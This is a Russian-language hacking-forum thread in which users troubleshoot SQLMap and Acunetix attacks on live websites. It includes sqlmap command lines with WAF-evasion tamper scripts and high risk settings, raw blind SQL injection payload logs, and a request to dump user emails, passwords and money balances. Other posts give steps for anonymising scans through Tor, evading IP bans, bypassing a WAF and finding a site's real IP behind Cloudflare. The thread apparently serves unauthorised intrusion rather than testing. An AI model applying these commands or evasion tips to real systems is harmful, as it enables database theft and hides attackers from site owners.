Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,115
    Likes Received:
    820
    Reputations:
    231
    Приветствую, если версия 12 и 13 (в 10 он просто в настройках включается GUI ) то вот выдержка из моего мануала

    1)Если нужна работа через тор
    качаем privoxy_3.0.28
    правим конфиг
    forward-socks5t / 127.0.0.1:9150 .
    forward-socks4 / 127.0.0.1:9150 .
    forward-socks4a / 127.0.0.1:9150 .

    12)C:\ProgramData\Acunetix\shared\general в файле settings.xml ищем слово proxy
    и меняем на 127.0.0.1 порт 8118
    13)Необязательный пункт!!! Теперь при скане сайта дополнительно в веб интерфейсе для каждого скана идем в вкладку HTTP и прописываем 127.0.0.1 порт 8118 (этот пункт оказался не обязательным ,если настройки прописаны в settings.xml)
    Проверить работу можно отключив тор- сайт не будет сканится.

    ========================
    чтобы не было утечки айпи при работе через тор нужно отключить следующие тесты ,которые используют порты в обход тор
    Server tests:
    Apache Tomcat AJP protocol audit
    JMX and RMI
    Java Debug Wire Protocol (JDWP) audit
    Open SSL TLS Heartbleed
    PHP Hash Collision DOS
    TLS/SSL audit

    Target Tests:
    Apache Cassandra
    FastGI Unauthorized Access
    Memcached
    Oracle Weblogic T3 XXE
    Redis Unath
    webLogic RCE
    Apache Log4j socket
    uWSGI

    UPD по поводу зависания веб. Веб вообще не участвует в скане ,это просто оболочка для wvsc.exe его (WEB-GUI) можно даже закрыть, и все равно сканы будут идти. Чтобы зависаний не было ,не ставьте на сайт макимум потоков , лучше 2 деление слева при начале скана. И комп на ссд + минимально 6 Гб оперы + обязательно не использовать дефолт профиль скана ,где включены тесты ДДос, если у вас цель стоит поиск ошибок ,а не положить сайт.
     
    _________________________
    Gigggs likes this.
  2. Gigggs

    Gigggs New Member

    Joined:
    12 Jan 2017
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста в чем может быть проблема..
    retrieving таблиц с начало норм шло

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Parameter: sort_by (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)



    5:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] resumed: ai_tracking_visits_today
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] retrieving the length of query output
    [15:06:37] [INFO] resumed: 10
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] resumed: ai_widgets
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] retrieving the length of query output
    [15:06:37] [INFO] resumed: 19
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] resumed: ai_widgets_comments
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] retrieving the length of query output
    [15:06:37] [INFO] resumed: 9
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] resumed: b?ppd?pp?
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] retrieving the length of query output
    [15:06:37] [INFO] resumed: b?ppd?pp?
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] resumed: b?ppd?pp?
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] retrieving the length of query output
    [15:06:37] [INFO] resumed: b?ppd?pp?

    А потом вот такая вот хрень пошла resumed: b?ppd?pp?
    [15:11:36] [PAYLOAD] (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(table_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x687564736f6e61745f6169 LIMIT 62,1),10,1))>57) THEN 0x6966286e6f7728293d7379736461746528292c736c6565702830292c3029 ELSE (SELECT 8755 UNION SELECT 5075) END))
    [15:11:38] [INFO] retrieved: b?ppd?pp?

    Заранее спасибо.
     
  3. polzunki

    polzunki New Member

    Joined:
    28 Jul 2020
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Приветствую
    Что можно сделать, чтобы обойти это? После определенного кол-ва запросов к сайту, сайт блокирует ip с которого к нему обращаются, и все попытки проверки обрубаются. Запрос к мапу выглядит так: sqlmap.py -u "https://site.com" --time-sec=32 --timeout=180 --identify-waf --force-ssl --random-agent -v 3 --technique=BU --skip="referrer" --tamper="between,randomcase,space2comment" --level 3 --risk 3 --dbs

    1.png
     
  4. d_dwacawaca

    d_dwacawaca Member

    Joined:
    4 Jan 2021
    Messages:
    24
    Likes Received:
    6
    Reputations:
    0
    Используй прокси, пусти трафик через ТОР
    Попробуй с того же IP, но почисти куки.
     
    Baskin-Robbins likes this.
  5. Duble

    Duble New Member

    Joined:
    28 Oct 2015
    Messages:
    36
    Likes Received:
    2
    Reputations:
    0
    Добрый день, подскажите плз как сделать так что бы sqlmap нашел определенного юзера по id
    Мой запрос
    Code:
     users -C id,email,password,money  --dump
    Мне допустим надо юзер с ID 123
     
  6. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    201
    Likes Received:
    657
    Reputations:
    151
     
    #1106 Baskin-Robbins, 10 Feb 2021
    Last edited: 10 Feb 2021
    Duble and seostock like this.
  7. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    184
    Likes Received:
    4
    Reputations:
    0
    [12:51:44] [INFO] fetching database names
    [12:51:44] [INFO] fetching number of databases
    [12:51:44] [PAYLOAD] -3870
    you provided a HTTP Cookie header value, while target URL provides its own cooki
    es within HTTP Set-Cookie header which intersect with yours. Do you want to merg
    e them in further requests? [Y/n] Y
    [12:51:44] [DEBUG] used the default behavior, running in batch mode
    [12:51:45] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
    _name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51-- tCKN
    [12:51:47] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
    _name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48-- tCKN
    [12:51:53] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
    _name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9-- tCKN
    [12:51:54] [INFO] retrieved:
    [12:51:54] [INFO] retrieved:


    Кто сталкивался?
     
  8. F1shka

    F1shka Elder - Старейшина

    Joined:
    10 Apr 2008
    Messages:
    175
    Likes Received:
    307
    Reputations:
    3
    Параметры с которыми запускаешь SQLMAP? Параметр --batch всегда жмет за тебя Y, --charset=utf-8 присваивает кодировку в UTF-8. Попробуй так:
    Code:
    sqlmap -u http://site[.]ru/ --batch --charset=utf-8 --threads=10 --risk=3 --level=5 --dbs --random-agent --hex
     
  9. Duble

    Duble New Member

    Joined:
    28 Oct 2015
    Messages:
    36
    Likes Received:
    2
    Reputations:
    0
    Code:
    [19:29:31] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
    [19:29:31] [PAYLOAD] -6241/**/oR/**/13/**/BEtWeeN/**/13/**/anD/**/13
    [19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
    [19:29:31] [PAYLOAD] -8727/**/oR/**/13/**/betweEN/**/74/**/AnD/**/74
    [19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
    [19:29:31] [PAYLOAD] -1511/**/Or/**/74/**/BeTwEEn/**/49/**/ANd/**/49
    [19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
    [19:29:31] [PAYLOAD] -6928/**/oR/**/49/**/beTwEEn/**/49/**/aNd/**/49
    [19:29:32] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
    [19:29:32] [WARNING] false positive or unexploitable injection point detected
    [19:29:32] [WARNING] URI parameter '#1*' does not seem to be injectable
    [19:29:32] [CRITICAL] all tested parameters do not appear to be injectable
    [19:29:32] [WARNING] HTTP error codes detected during run:
    503 (Service Unavailable) - 681 times
    
    [*] ending @ 19:29:32 /2021-02-19/
    В чем проблема?
    Code:
    --url "http://site.com/?id=1*" --random-agent --tamper=between,randomcase,space2comment,luanginx --risk 3 --level 5 -v 3 --dbms=mysql --time-sec=32 --timeout=180 --identify-waf --batch  --hex --drop-set-cookie --text-only
    До этого крутилось все норм, сейчас на сайте поставлен waf как я понимаю. На сайте так же есть Cloudflare.
    Подскажите как быть?
    [​IMG]
    Не обнаруживает базы данных
    [​IMG]
     
    #1109 Duble, 19 Feb 2021
    Last edited: 19 Feb 2021
  10. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    184
    Likes Received:
    4
    Reputations:
    0
    Теперь ищи реальный ИП сайта.Смотри DNS записи
     
Loading...